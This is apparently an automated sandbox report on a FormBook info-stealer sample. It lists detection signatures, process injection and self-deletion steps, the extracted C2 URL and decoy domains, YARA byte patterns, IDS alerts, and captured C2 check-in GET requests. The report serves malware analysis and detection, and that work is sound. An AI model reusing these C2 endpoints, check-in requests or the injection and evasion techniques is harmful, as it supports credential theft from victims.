Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yPURXYpFVuXra2o.exe

Overview

General Information

Sample name:yPURXYpFVuXra2o.exe
Analysis ID:1450804
MD5:6c73961037087d34597fc8a582388bcc
SHA1:fc96081d921b7f82b9c559ffc335b02364199fd7
SHA256:93815b97bf6c09abc9e705096381dd25b658853e0751f7b95cc51123c251bcf2
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • yPURXYpFVuXra2o.exe (PID: 2392 cmdline: "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe" MD5: 6C73961037087D34597FC8A582388BCC)
    • yPURXYpFVuXra2o.exe (PID: 7124 cmdline: "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe" MD5: 6C73961037087D34597FC8A582388BCC)
      • explorer.exe (PID: 5272 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • cscript.exe (PID: 4960 cmdline: "C:\Windows\SysWOW64\cscript.exe" MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
          • cmd.exe (PID: 3460 cmdline: /c del "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spiritualpath.info/cr12/"], "decoy": ["nff1291.com", "satyainfra.com", "hechiceradeamores.com", "jfgminimalist.com", "qut68q.com", "pedandmore.com", "sugardefender24-usa.us", "somalse.com", "lotusluxecandle.com", "certificadobassetpro.com", "veryaroma.com", "thehistoryofindia.in", "33155.cc", "terastudy.net", "84031.vip", "heilsambegegnen.com", "horizon-rg.info", "junongpei.website", "winstons.club", "henslotalt.us", "home-care-72875.bond", "elmetaversal.com", "thetrendingproduct.com", "kiki-hello-jury.com", "fertami.info", "free-cell-phones-en-arena.sbs", "emilogiska.com", "airexam.in", "masters-of-1.com", "othersidings.com", "fullpaw.com", "xmmtrader.com", "astronomersparadise.net", "cert.agency", "pools-97641.bond", "forexsignals-trading.com", "bxsmediaconsulting.com", "perfectedskincare.com", "footresort.com", "warehouse-inventory-80963.bond", "purifygenius.com", "bolinkpass.club", "velleclub.com", "epuar.com", "winningpickleballshots.com", "spiaggia.club", "kadinzuri.com", "keyboards-280323.cfd", "africanfemalefounders.club", "tkoelectriical.com", "wg5688.com", "properrr.com", "fortune-tiger-rede.com", "65302.vip", "psychologyzerodegrees.today", "top99bet4d.site", "priuswuxi.com", "carneden.com", "ptwix.xyz", "furniture-70925.bond", "064817.com", "ferradaoffroad.com", "pix2click.life", "jurj.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 5 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:06/03/24-08:51:59.597269
          SID:2031412
          Source Port:50420
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:54:04.267969
          SID:2031412
          Source Port:50424
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:55:06.601778
          SID:2031412
          Source Port:50425
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:48:54.513491
          SID:2031412
          Source Port:50413
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:49:36.291491
          SID:2031412
          Source Port:50415
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:53:21.780359
          SID:2031412
          Source Port:50422
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:53:42.406609
          SID:2031412
          Source Port:50423
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:50:16.815432
          SID:2031412
          Source Port:50416
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:50:57.933052
          SID:2031412
          Source Port:50418
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:47:33.122866
          SID:2031412
          Source Port:50410
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:47:53.631791
          SID:2031412
          Source Port:50411
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:50:37.423270
          SID:2031412
          Source Port:50417
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:51:18.553227
          SID:2031412
          Source Port:50419
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:48:13.875537
          SID:2031412
          Source Port:50412
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:52:40.866374
          SID:2031412
          Source Port:50421
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.spiritualpath.info/cr12/"], "decoy": ["nff1291.com", "satyainfra.com", "hechiceradeamores.com", "jfgminimalist.com", "qut68q.com", "pedandmore.com", "sugardefender24-usa.us", "somalse.com", "lotusluxecandle.com", "certificadobassetpro.com", "veryaroma.com", "thehistoryofindia.in", "33155.cc", "terastudy.net", "84031.vip", "heilsambegegnen.com", "horizon-rg.info", "junongpei.website", "winstons.club", "henslotalt.us", "home-care-72875.bond", "elmetaversal.com", "thetrendingproduct.com", "kiki-hello-jury.com", "fertami.info", "free-cell-phones-en-arena.sbs", "emilogiska.com", "airexam.in", "masters-of-1.com", "othersidings.com", "fullpaw.com", "xmmtrader.com", "astronomersparadise.net", "cert.agency", "pools-97641.bond", "forexsignals-trading.com", "bxsmediaconsulting.com", "perfectedskincare.com", "footresort.com", "warehouse-inventory-80963.bond", "purifygenius.com", "bolinkpass.club", "velleclub.com", "epuar.com", "winningpickleballshots.com", "spiaggia.club", "kadinzuri.com", "keyboards-280323.cfd", "africanfemalefounders.club", "tkoelectriical.com", "wg5688.com", "properrr.com", "fortune-tiger-rede.com", "65302.vip", "psychologyzerodegrees.today", "top99bet4d.site", "priuswuxi.com", "carneden.com", "ptwix.xyz", "furniture-70925.bond", "064817.com", "ferradaoffroad.com", "pix2click.life", "jurj.xyz"]}
          Multi AV Scanner detection for submitted file
          Source: yPURXYpFVuXra2o.exeReversingLabs: Detection: 31%
          Source: yPURXYpFVuXra2o.exeVirustotal: Detection: 34%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: yPURXYpFVuXra2o.exeJoe Sandbox ML: detected
          Source: yPURXYpFVuXra2o.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: yPURXYpFVuXra2o.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cscript.pdbUGP source: yPURXYpFVuXra2o.exe, 00000005.00000002.30408359939.0000000003710000.00000040.10000000.00040000.00000000.sdmp, yPURXYpFVuXra2o.exe, 00000005.00000002.30406647989.0000000001368000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: yPURXYpFVuXra2o.exe, 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30409751558.0000000004FCD000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30406496494.0000000004E20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: yPURXYpFVuXra2o.exe, yPURXYpFVuXra2o.exe, 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000007.00000003.30409751558.0000000004FCD000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30406496494.0000000004E20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cscript.pdb source: yPURXYpFVuXra2o.exe, 00000005.00000002.30408359939.0000000003710000.00000040.10000000.00040000.00000000.sdmp, yPURXYpFVuXra2o.exe, 00000005.00000002.30406647989.0000000001368000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00412674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,7_2_00412674
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 4x nop then pop edi5_2_00417DA6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi7_2_03017DA6

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50410 -> 103.224.212.213:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50411 -> 172.67.182.124:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50412 -> 84.32.84.251:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50413 -> 172.67.158.76:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50415 -> 40.81.24.207:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50416 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50417 -> 103.169.142.0:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50418 -> 104.21.11.125:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50419 -> 91.195.240.19:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50420 -> 172.67.185.213:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50421 -> 104.247.81.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50422 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50423 -> 64.190.62.22:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50424 -> 40.81.24.207:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50425 -> 66.94.112.248:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.213 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.182.124 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.spiritualpath.info/cr12/
          Source: global trafficHTTP traffic detected: GET /cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs HTTP/1.1Host: www.bolinkpass.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cr12/?XDHHT=EMrw1bwJWliw0FwpqVXnoYhnVkfUleLKpzdhUAtZvcFg+78qkpfmZQ0FVMWvYMkzI5s2&MZt0=njKl2H4htFXPs HTTP/1.1Host: www.spiritualpath.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.224.212.213 103.224.212.213
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: C:\Windows\explorer.exeCode function: 6_2_13971F82 getaddrinfo,setsockopt,recv,6_2_13971F82
          Source: global trafficHTTP traffic detected: GET /cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs HTTP/1.1Host: www.bolinkpass.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cr12/?XDHHT=EMrw1bwJWliw0FwpqVXnoYhnVkfUleLKpzdhUAtZvcFg+78qkpfmZQ0FVMWvYMkzI5s2&MZt0=njKl2H4htFXPs HTTP/1.1Host: www.spiritualpath.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ","url":"https://www.msn.com/en-us/movies/news/netflix-users-celebrate-as-2023-masterpiece-finally-debuts-online/ar-BB1nu0QG","locale":"en-us","isLocalContent":false,"publishedDateTime":"2024-06-02T13:35:42Z","feed":{"id":"Y_2a7bc05a-60f4-46df-a4ef-e938b38a4ccd","feedName":"Movies","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":1200,"height":900,"url":"https://th.bing.com/th?id=ORMS.c01bb8b43615341dbbfa0ad17bc05a9f&pid=Wdp","title":"Godzilla-Minus-One.png","caption":"Godzilla-Minus-One.png","focalRegion":{"x1":428,"x2":819,"y1":321,"y2":712},"source":"msn","colorSamples":[{"isDarkMode":true,"hexColor":"#24241C","isGreyScale":false},{"isDarkMode":false,"hexColor":"#DDD5C0","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#24241C","isGreyScale":false},{"isDarkMode":false,"hexColor":"#DDD5C0","isGreyScale":false}],"provider":{"id":"AA2ebJ","name":"The Independent","logoUrl":"https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBERG9W.img","profileId":"vid-xgcughpui3cy7wqqbraqf5xbef43jb7gjx5j8888ng5fsgus3ggs"},"category":"movies","reactionSummary":{"totalCount":118,"subReactionSummaries":[{"totalCount":90,"type":"upvote"},{"totalCount":28,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":20,"subCommentSummaries":[{"totalCount":19,"type":"comment"},{"totalCount":1,"type":"reply"}]},"commentStatus":"on","cardId":3,"reasons":[{"type":"cF_Ip","rank":0}],"ri":"334","recoId":"m9EZkeedgX5eUa-QBobFkaKzgm","source":"msn"},{"id":"BB1n3Nf3","type":"article","title":"Don't Be Afraid: Buy Your Favorite TV Shows on DVD","abstract":"It's not hoarding Honey, it's preservation.","url":"https://www.msn.com/en-us/money/personalfinance/don-t-be-afraid-buy-your-favorite-tv-shows-on-dvd/ar-BB1n3Nf3","locale":"en-us","isLocalContent":false,"publishedDateTime":"2024-05-25T15:00:14Z","feed":{"id":"Y_f714b6e2-e9db-41d0-9b5f-b2e0a52f85da","feedName":"Money","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":2100,"height":1400,"url":"https://th.bing.com/th?id=ORMS.8a8aef162e5c1943681182b7e2d02b5e&pid=Wdp","title":"Don't Be Afraid: Buy Your Favorite TV Shows on DVD","source":"msn","colorSamples":[{"isDarkMode":true,"hexColor":"#54451B","isGreyScale":false},{"isDarkMode":false,"hexColor":"#EBCED3","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#54451B","isGreyScale":false},{"isDarkMode":false,"hexColor":"#EBCED3","isGreyScale":false}],"provider":{"id":"BB1loBHK","name":"HowToGeek","logoUrl":"https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1loxoX.img","profileId":"vid-vwhvix47d73xx49epp3y40e054g07u736snsjdfvimbykjwx62bs"},"category":"money","reactionSummary":{"totalCount":19,"subReactionSummaries":[{"totalCount":17,"type":"upvote"},{"totalCount":2,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":1,"subCommentSummaries":[{"totalCount":1,"type":"comment"}]},"commentStatus":"on","cardId":4,"reasons":[{"type":"explore","rank":0,"follow":{"id":
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: s Spider-Man Remastered 08:54 - A Plague Tale Requiem 10:00 - Assassin's Creed Mirage 10:24 - Watch Dogs Legion 10:44 - Hitman 3 11:28 - Counter Strike 2 12:13 - Call Of Duty Modern Warfare III 12:50 - 12 Game Average [1080p] 13:43 - Final Thoughts Read this feature on TechSpot: https://www.techspot.com/review/2821-amd-ryzen-7800x3d-7900x3d-7950x3d/ V Cache Battle: 7800X3D vs 7900X3D vs 7950X3D Disclaimer: Any pricing information shown or mentioned in this video was accurate at the time of video production, and may have since changed Disclosure: As an Amazon Associate we earn from qualifying purchases. We may also earn a commission on some sales made through other store links FOLLOW US IN THESE PLACES FOR UPDATES Twitter - http://twitter.com/hardwareunboxed Facebook - http://facebook.com/hardwareunboxed Instagram - https://www.instagram.com/hardwareunboxed/ Outro music by David Vonk/DaJaVo","url":"https://www.youtube.com/watch?v=Gu12QOQiUUI","locale":"en-us","isLocalContent":false,"publishedDateTime":"2024-03-28T10:00:23","feed":{"feedName":"news","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":3840,"height":2160,"url":"https://th.bing.com/th?id=OVP.Zg5kob1eG3vNAhn5g3iOGQHgFo","title":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. Ryzen 9 7950X3D, Gaming Benchmark","caption":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. Ryzen 9 7950X3D, Gaming Benchmark","source":"bing","colorSamples":[{"isDarkMode":true,"hexColor":"#2E2E2E","isGreyScale":false},{"isDarkMode":false,"hexColor":"#F5F5F5","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#253D3B","isGreyScale":false},{"isDarkMode":false,"hexColor":"#EAF5F5","isGreyScale":false}],"provider":{"id":"vid-gkg786ucfpu46xnx5n80yvfyceqwsqweke9jhc8g7a0782qsfc0a","name":"Hardware Unboxed","logoUrl":"https://www.bing.com/th?id=AR_e1aad59e9b84f32b322c4036057c9f3d"},"category":"news","reactionSummary":{"totalCount":30,"subReactionSummaries":[{"totalCount":24,"type":"upvote"},{"totalCount":6,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":0},"commentStatus":"on","cardId":7,"reasons":[{"type":"explore","rank":0,"follow":{"id":"","name":"gaming","time":""}}],"recoId":"m9EZkeedgX5eUa-QBobFkaKzgm","source":"WebVideo"},{"id":"BB1j6YDZ","type":"video","title":"Top 10 Catchiest Songs of the 2010s","abstract":"These songs have been living rent-free in our head for years! For this list, we equals www.facebook.com (Facebook)
